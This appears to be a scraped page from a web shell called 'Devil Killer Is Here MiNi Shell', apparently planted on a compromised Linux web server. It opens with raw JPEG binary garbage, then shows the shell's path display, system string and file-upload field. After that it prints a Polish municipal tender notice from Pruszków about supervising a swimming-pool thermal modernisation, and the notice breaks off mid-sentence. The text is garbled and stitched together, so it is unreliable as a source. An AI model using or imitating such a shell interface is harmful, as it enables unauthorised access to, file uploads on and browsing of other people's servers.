JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210916/0018272101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienia Nadzoru Inwestorskiego dla zadań inw pn. „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – term basenu Kapry” oraz „Wymiana zjeżdżalni”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Pruszków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015834660</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">J.I. Kraszewskiego 14/16</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pruszków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-800</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@miasto.pruszkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pruszkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienia Nadzoru Inwestorskiego dla zadań inw pn. „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – term basenu Kapry” oraz „Wymiana zjeżdżalni”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5de039ab-16cf-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00182721</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003322/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie - pełnienie nadzoru inwestorskiego nad termomodernizacją basenu "Kapry" oraz przebudowa budynku basenu "Kapry" </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Głeboka termomodernizacja budynków użyteczności publicznej w Pruszkowie </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.um.pruszkow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej - bzp@miasto.pruszkow.pl<br/>adres strony internetowej: https://bip.um.pruszkow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1/ Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/><br/>2/ Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. Świadczenie usług w zakresie: Pełnienia Nadzoru Inwestorskiego dla zadań inwestycyjnych pn. „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – termomodernizacja basenu Kapry” oraz „Przebudowa budynku basenu Kapry – wymiana zjeżdżalni”.<br/><br/>3/ Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/><br/>4/ Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/><br/>5/ Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się w załączniku nr 9 do SWZ.<br/><br/>6/ Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w ppkt 2) powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w ppkt 2) powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7/ Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>- obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/><br/>8/ W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta pod treścią zawierającą dane osoby trzeciej - załącznik nr 6 do SWZ - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia.<br/><br/>9/ Zamawiający informuje, że:<br/>- Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia. <br/>- W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>- Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>- W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>- W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WSR.271.59.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług w zakresie: Pełnienia Nadzoru Inwestorskiego dla zadań inwestycyjnych pn. „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – termomodernizacja basenu Kapry” oraz „Przebudowa budynku basenu Kapry – wymiana zjeżdżalni”.<br/><br/>1.2/ Szczegółowo przedmiot zamówienia obejmuje: <br/><br/>Pełnienie Nadzoru Inwestorskiego podczas realizacji zadania zgodnie z:<br/>- projektem budowlanym pn. „Przebudowa basenu Kapry w zakresie wykonania instalacji gazowej, budowy pomieszczenia dla instalacji mikrokogeneracji oraz budowy nadproża” z kwietnia 2020 r. autorstwa mgr inż. arch. Szymona Majcherczyka – w zakresie niezbędnym do wykonania nadproża,<br/>- projektem wykonawczym pn. „Termomodernizacja basenu Kapry w Pruszkowie” z maja 2020 r. autorstwa mgr inż. arch. Szymona Majcherczyka – w zakresie określonym w opracowaniu pn. „Szczegółowy opis przedmiotu zamówienia” z dn. 30.04.2021 r. tego samego autora,<br/>- decyzją Starosty Pruszkowskiego nr 824/2020 z dn. 15.06.2020 r. zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę obejmujące przebudowę budynku basenu „Kapry” w zakresie wykonania instalacji gazowej, budowy pomieszczenia dla instalacji mikrokogeneracji oraz budowy nadproża na dz. nr ew. 8/6, 8/7, 8/8, 8/9 obr. 24 w Pruszkowie – w zakresie, o którym mowa w tiret pierwsze, <br/>- zgłoszeniem wykonania robót budowlanych z dnia 10.04.2020 r. dot. wymiany pokrycia dachowego, remontu elewacji i montażu paneli fotowoltaicznych – w zakresie wymiany pokrycia dachowego,<br/>- obmiarem robót remontowych i innych robót oraz specyfikacjami technicznymi wykonania i odbioru robót z dnia 03.05.2021 r. autorstwa Pawła Kowalewskiego, których zakres został określony na podstawie protokołu okresowej rocznej kontroli stanu technicznego obiektu Miejskiej Pływalni Krytej „Kapry” z lutego 2021 r., sporządzonego przez Arkada P.T.O.B.,<br/>- projektem budowlanym pn. „Wymiana ślizgów zjeżdżalni i budowa dwóch słupów” z marca 2021 r. autorstwa mgr inż. arch. Szymona Majcherczyka,<br/>- decyzją Starosty Pruszkowskiego nr 1036/2021 z dn. 27.05.2021 r. zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę obejmujące wymianę ślizgów zjeżdżalni i budowę dwóch słupów (budynek basenu „Kapry”) na dz. nr ew. 8/6, 8/7, 8/8, 8/9 obr. 24 w Pruszkowie,<br/>- projektem wykonawczym pn. „Wymiana ślizgów zjeżdżalni i budowa dwóch słupów” z kwietnia 2021 r. autorstwa mgr inż. arch. Szymona Majcherczyka,<br/>- umowami na kompleksowe wykonanie zadań inwestycyjnych, pn. „Przebudowa budynku basenu Kapry – wymiana zjeżdżalni” oraz „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – Termomodernizacja basenu Kapry”, podpisanymi pomiędzy Zamawiającym a wykonawcami robót budowlanych.<br/>Zadania inwestycyjne realizowane będą na podstawie ww. dokumentacji w zakresie monitoringu, nadzoru, kontroli, rozliczenia i niezbędnej sprawozdawczości dla zadania, tj. m.in.:<br/>- pełnienie funkcji Inspektora Nadzoru Inwestorskiego (w branży konstrukcyjno-budowlanej, sanitarnej i elektrycznej) zgodnie z obowiązkami i prawami określonymi w art. 25 i 26 Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333 z późn. zm.) na podstawie zgłoszenia robót budowlanych i decyzji o pozwoleniu na budowę, <br/>- sprawdzenie i akceptacja sporządzonych przez Wykonawcę harmonogramów rzeczowo-finansowych robót oraz zmian tych harmonogramów,<br/>- kontrola prawidłowości prowadzenia dzienników budowy, potwierdzanie wpisem w dziennikach budowy wykonania prac, w tym ulegających zakryciu oraz dokonywanie w dziennikach budowy innych wpisów dokumentujących okoliczności mające znaczenie dla oceny właściwego wykonania robót,<br/>- informowania na bieżąco Zamawiającego o przebiegu realizacji Zadań Inwestycyjnych,<br/>- składania Zamawiającemu drogą mailową tygodniowych raportów z działalności obejmującej prowadzenie nadzoru robót oraz z realizacji Zadań Inwestycyjnych wraz z dokumentacją zdjęciową. Raport tygodniowy przesyłany drogą mailową powinien zawierać: opis postępu robót w stosunku do sporządzonych przez Wykonawców harmonogramów, opisy powstałych problemów i zagrożeń oraz działań podjętych w celu ich usunięcia, fotografie dokumentujące postęp robót, wykaz zmian w dokumentacji projektowej oraz sprawowanie kontroli w zakresie spełnienia wymogu zatrudnienia przez Wykonawców robót lub podwykonawców osób wykonujących czynności związane z wykonywaniem prac, na podstawie umowy o pracę.<br/>- prowadzenia co najmniej jeden raz w tygodniu narad koordynacyjnych na budowie w których uczestniczyć będą: Wykonawcy robót, Zamawiający i w razie potrzeby użytkownik i projektant. Inspektor nadzoru po każdej naradzie sporządzi protokół podpisany przez uczestników, który przekaże Zamawiającemu i Wykonawcy,<br/>- koordynowania działań Wykonawców robót z Dyrekcją Miejskiej Pływalni Krytej KAPRY przy ul. Andrzeja 3 w Pruszkowie, w celu zapewnienia, w razie zaistnienia takiej potrzeby jego funkcjonowania przez okres realizacji Zadań Inwestycyjnych,<br/>- koordynowania działań Wykonawców robót z zarządcami, właścicielami innych terenów sąsiadujących z obszarem realizacji zadania,<br/>- zapewnienia przez okres trwania realizacji Zadań Inwestycyjnych, niezbędnej obecności kadry technicznej na terenie budowy do pięciu razy w tygodniu, ale nie rzadziej niż raz w tygodniu i na każde wezwanie Wykonawcy lub Zamawiającego, pełniącej bieżący nadzór nad jego realizacją. Czas pracy Inspektorów Nadzoru Inwestorskiego powinien być dostosowany do pracy Wykonawcy robót i wymagań Zamawiającego,<br/>- oceny zgodności wbudowywanych materiałów z projektem i przepisami prawa oraz ich jakości,<br/>- kontroli jakości wykonywanych prac oraz ich zgodności ze zgłoszeniem robót budowlanych, decyzjami o pozwoleniu na budowę, przepisami techniczno-budowlanymi, obowiązującymi normami, specyfikacjami technicznymi, zasadami wiedzy technicznej, dokumentacją projektową oraz umowami zawartą między Wykonawcami robót budowlanych a Zamawiającym,<br/>- rozstrzygania w porozumieniu z kierownikami budowy i kierownikami robót wątpliwości natury technicznej powstałych w toku wykonywania robót, w tym spowodowanych ewentualnymi nieścisłościami w dokumentacji projektowej i ewentualną niezgodnością z przepisami Prawa budowlanego w porozumieniu z projektantem,<br/>- wprowadzania w uzgodnieniu z Zamawiającym, projektantem i kierownikami budowy zmian w dokumentacji projektowej, pod warunkiem udokumentowania ich zasadności lub konieczności,<br/>- weryfikacji i akceptacji kart materiałowych dotyczących materiałów proponowanych przez Wykonawców do wbudowania,<br/>- kontroli umów o podwykonawstwo pod kątem ich zgodności z obowiązującymi przepisami i umową zawartą pomiędzy Zamawiającym a Wykonawcami,<br/>- sprawdzania i weryfikowania kosztorysów na roboty budowlane, dodatkowe, zaniechane i zmianę technologii,<br/>- obsługi prawnej inwestycji, w razie zaistnienia takiej potrzeby,<br/>- udzielania odpowiedzi na pisma Wykonawców,<br/>- zatwierdzenia protokołów odbioru robót częściowych i końcowych,<br/>- uczestnictwa na wniosek Zamawiającego w kontrolach inwestycji, w trakcie ich realizacji i po ich zakończeniu, dokonywanych przez podmioty zewnętrzne oraz udzielanie wyjaśnień podmiotom kontrolującym,<br/>- sprawdzenie kompletności przedstawionych przez Wykonawców niezbędnych do odbioru robót dokumentów oraz zgodności robót z warunkami technicznymi wykonania i odbioru robót,<br/>- rozliczenia inwestycji (finansowego i rzeczowego, np. dokumenty odbiorowe, protokoły zdawczo-odbiorcze środka trwałego PT, przyjęcie środka trwałego OT itp.),<br/>- udziału w przeglądach gwarancyjnych i pogwarancyjnych, uczestnictwo w komisjach dotyczących stwierdzenia ujawnionych wad, potwierdzania usunięcia wad i wykonania robót poprawkowych,<br/><br/>Dane charakterystyczne zadania:<br/>- powierzchnia dachu przeznaczona do termomodernizacji: 1058,28 m2 + 292,23 m2 + 29,94 m2,<br/>- wymiana centrali wentylacyjnej basenowej,<br/>- wymiana dwóch ślizgów zjeżdżalni,<br/>- wykonanie innych prac remontowych, budowlanych i instalacyjnych.<br/><br/>Planowany termin realizacji inwestycji:<br/>- rozpoczęcie prac budowlanych: III kwartał 2021 r. (od terminu przekazania placu budowy Wykonawcom prac budowlanych)(<br/>- zakończenie prac budowlanych w zakresie zadania „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – Termomodernizacja basenu Kapry”: IV kwartał 2021 r.,<br/>- zakończenie prac budowlanych w zakresie zadania „Przebudowa budynku basenu Kapry – wymiana zjeżdżalni”: I kwartał 2022 r. <br/>- zakończenie świadczenia usług w zakresie pełnienia Nadzoru Inwestorskiego w zakresie zadania „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – Termomodernizacja basenu Kapry”: IV kwartał 2021 r. (20.12.2021 r.).<br/>- zakończenie świadczenia usług w zakresie pełnienia Nadzoru Inwestorskiego w zakresie zadania „Przebudowa budynku basenu Kapry – wymiana zjeżdżalni”: I kwartał 2022 r. (6 miesięcy od podpisania umowy z wykonawcą Zadania Inwestycyjnego).<br/><br/>UWAGA<br/>Zadanie może być realizowane przy czynnym obiekcie budynku Pływalni Miejskiej Kapry oraz w sąsiedztwie okolicznej zabudowy jednorodzinnej, przemysłowej i usługowej oraz obszarów objętych ochroną przyrody – Warszawskiego Obszaru Chronionego Krajobrazu i Zespołu Przyrodniczo-Krajobrazowego Stawy Pęcickie.<br/>Zadanie „Głęboka termomodernizacja budynków użyteczności publicznej w Pruszkowie – Termomodernizacja basenu Kapry” jest dofinansowane ze środków UE. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71540000-5 - Usługi zarządzania budową</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71244000-0 - Kalkulacja kosztów, monitoring kosztów</p> <p class="mb-0">71247000-1 - Nadzór nad robotami budowlanymi</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71310000-4 - Doradcze usługi inżynieryjne i budowlane</p> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71630000-3 - Usługi kontroli i nadzoru technicznego</p> <p class="mb-0">71700000-5 - Usługi nadzoru i kontroli</p> <p class="mb-0">79994000-8 - Usługi zarządzania umowami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1/ Zamawiający przewiduje udzielenie zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp/zamówienia 